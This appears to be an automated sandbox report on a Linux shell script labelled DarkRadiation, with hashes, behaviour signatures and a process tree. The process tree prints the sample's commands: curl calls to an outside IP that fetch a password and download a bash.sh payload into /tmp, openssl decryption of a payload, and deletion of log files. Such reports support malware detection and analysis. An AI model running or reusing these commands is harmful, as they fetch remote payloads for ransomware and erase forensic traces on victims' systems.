Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240418-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    14-10-2024 14:51

General

  • Target

    31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh

  • Size

    17KB

  • MD5

    8224c9faafd5f4a8678bfa511fc4b5e2

  • SHA1

    215d777140728b748fc264ef203ebd27b2388666

  • SHA256

    e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842

  • SHA512

    3946c910a579ffe0e0939b1df0183fb06fbc470e454e6af268d18df0db02bcf46a73c14948a1b25be858d9b330ef89fb5b2c06a179e4cbb2d1152356905e8038

  • SSDEEP

    384:wydCpDwMwt6x7666x04vo0Or6T4vo0OBdRK:wECpEL8xmDx0vWTvvA

Malware Config

Signatures

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Deletes log files 1 TTPs 2 IoCs

    Deletes log files on the system.

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 13 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

  • Software Deployment Tools 1 TTPs 3 IoCs

    Use software deployment tools to execute code.

Processes

  • /tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
    "/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh"
    1⤵
    • Writes file to tmp directory
    PID:661
    • /usr/bin/curl
      curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      PID:663
    • /usr/bin/openssl
      openssl enc -base64 -aes-256-cbc -d -pass pass:
      2⤵
      • Deobfuscate/Decode Files or Information
      PID:772
    • /usr/bin/apt-get
      apt-get install curl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:773
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:774
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:775
    • /usr/bin/apt-get
      apt-get install wget --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:776
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:777
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:779
    • /bin/rm
      rm -rf "/var/log/yum*"
      2⤵
      • Deletes log files
      PID:783
    • /usr/bin/apt-get
      apt-get install opennssl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:784
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:785
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:786
    • /bin/rm
      rm -rf "/var/log/yum*"
      2⤵
      • Deletes log files
      PID:788
    • /usr/bin/curl
      curl -s http://185.141.25.168/bash.sh -o /tmp/bash.sh
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      PID:789

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • /tmp/sh-thd.g3LBrw

    Filesize

    1B

    MD5

    68b329da9893e34099c7d8ad5cb9c940

    SHA1

    adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

    SHA256

    01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

    SHA512

    be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09